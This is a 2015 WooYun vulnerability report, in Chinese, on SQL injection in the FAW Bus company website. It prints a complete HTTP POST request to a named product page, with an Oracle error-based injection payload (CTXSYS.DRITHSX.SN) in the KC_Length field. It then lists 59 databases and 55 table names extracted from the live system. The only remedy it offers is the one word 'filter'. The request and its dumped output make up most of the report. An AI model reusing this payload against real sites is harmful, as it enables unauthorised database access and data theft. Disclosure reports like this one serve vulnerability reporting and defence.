当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143259

漏洞标题:一汽客车官网存在SQL严重漏洞(涉及59个库)

相关厂商:一汽客车有限公司

漏洞作者: 霝z

提交时间:2015-10-14 17:39

修复时间:2015-12-03 08:48

公开时间:2015-12-03 08:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

RT

详细说明:

1、注入点

POST /cpzt/kcproduct.jsp?pros=3&where=3&Type=004004 HTTP/1.1
Cache-Control: no-cache
Referer: http://**.**.**.**/cpzt/kcproduct.jsp?where=&Type=004004&pros=
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
Host: **.**.**.**
Cookie: JSESSIONID=Q2JzWBKTD1DxnYZfwcVmYCvX7QQFgXvM3n5jwdGmyfwWw1myWVlv!1092529893
Accept-Encoding: gzip, deflate
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
button=3&KC_Length=%27%7c%7cCTXSYS.DRITHSX.SN(user%2c(select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97)+from+DUAL))%7c%7c%27&KC_USE=1


2.涉及database:

available databases [59]:
[*] BMXJ
[*] CTXSYS
[*] DANG
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] FAW_FWKC
[*] FAW_FWQC
[*] FAW_GONGHUI
[*] FAW_TW
[*] FAWGLB
[*] FAWONLINE
[*] FDJ
[*] FFCL
[*] FWQCNEW
[*] FY
[*] GZTD
[*] HAQING
[*] HONGQI
[*] HYJD
[*] JF_JHSB
[*] JFCC
[*] JFGS
[*] JG
[*] JIEFANG
[*] JLS_HOSPITAL
[*] JSZX
[*] KECHE
[*] MARKETING
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] QCBZ
[*] QCCY
[*] QCDZ
[*] QIMING
[*] QMSN
[*] SALEEVAL
[*] SCB
[*] SCBSEARCH
[*] SCOTT
[*] SHCOM
[*] SHJD
[*] SHSYB
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TIAA
[*] TSMSYS
[*] TW
[*] TZSB
[*] WHZG
[*] WMSYS
[*] WP
[*] XDB
[*] XNYQC
[*] YQFW
[*] YQQN


3.其中一个database的tables

Database: FAW_FWKC
[55 tables]
+--------------------+
| DIC_P3DIC          |
| DIC_PDIC           |
| DIC_SONLEI         |
| DSJ_ARTICLE        |
| DSJ_CONTENT        |
| DSJ_PIC            |
| DSJ_TEMPLATE       |
| DSJ_TYPE           |
| FWKC_DPPARAM_TABLE |
| FWKC_FGS           |
| FWKC_FGSLB         |
| FWKC_FWS           |
| FWKC_FWSLB         |
| FWKC_FWZ           |
| FWKC_FWZLB         |
| FWKC_PARAM_TABLE   |
| HYZX_ARTICLE       |
| HYZX_CONTENT       |
| HYZX_PIC           |
| HYZX_TEMPLATE      |
| HYZX_TYPE          |
| LY                 |
| MAINITEM           |
| PUBLIC_AREA        |
| PUBLIC_DWZP        |
| PUBLIC_FBZT        |
| PUBLIC_HISTORY     |
| PUBLIC_HTML        |
| PUBLIC_HTYPE       |
| PUBLIC_LOGIN       |
| PUBLIC_MODULE      |
| PUBLIC_TABLE       |
| PUBLIC_UPDOWN      |
| PUBLIC_UPFILE      |
| PUBLIC_XXTJ        |
| PUBLIC_ZTHF        |
| QM_MODULE          |
| QM_ROLEDM          |
| SDF_ARTICLE        |
| SDF_CONTENT        |
| SDF_PIC            |
| SDF_TEMPLATE       |
| SDF_TYPE           |
| WEB_LY             |
| XCZT_ARTICLE       |
| XCZT_CONTENT       |
| XCZT_PIC           |
| XCZT_TEMPLATE      |
| XCZT_TYPE          |
| XWDT_ARTICLE       |
| XWDT_CONTENT       |
| XWDT_PIC           |
| XWDT_TEMPLATE      |
| XWDT_TYPE          |
| YQZX_DUAL          |
+--------------------+

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 霝z@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-19 08:47

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无